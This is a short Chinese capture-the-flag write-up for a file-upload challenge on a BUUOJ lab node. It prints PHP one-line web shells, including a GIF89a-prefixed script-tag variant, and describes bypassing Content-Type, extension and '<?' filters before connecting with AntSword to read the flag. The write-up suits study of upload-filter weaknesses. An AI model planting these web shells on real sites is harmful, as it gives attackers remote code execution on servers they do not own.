1. 题目描述
题目链接:戳我💋
题目打开是一个文件上次功能点

2. 解题过程
首次常规操作二话不说先上传一个一句话木马。
<?php @eval($_POST['123'])?>
页面提示被拦截,并显示not image

那我们进行抓包修改Content-Type字段进行绕过


发现php后缀被拦截,所以我们用畸形的后缀在进行绕过。
phtml、pht、php、php3、php4、php5
发现phtml可以正常绕过


发现<?被检测出来,进行拦截了,所以我们需要替换我们的一句话木马。
GIF89a? <script language="php">eval($_REQUEST[123])</script>
然后就上次成功了

访问upload目录

蚂剑连接:http://c1f27374-3383-4b46-bd11-125e9b7cfbd2.node5.buuoj.cn/upload/shell.phtml

打开根目录获得 flag

3. 所需工具
- Burpsuite
- 中国蚁剑
4. 写在最后
本文完
敬爱与明天🌹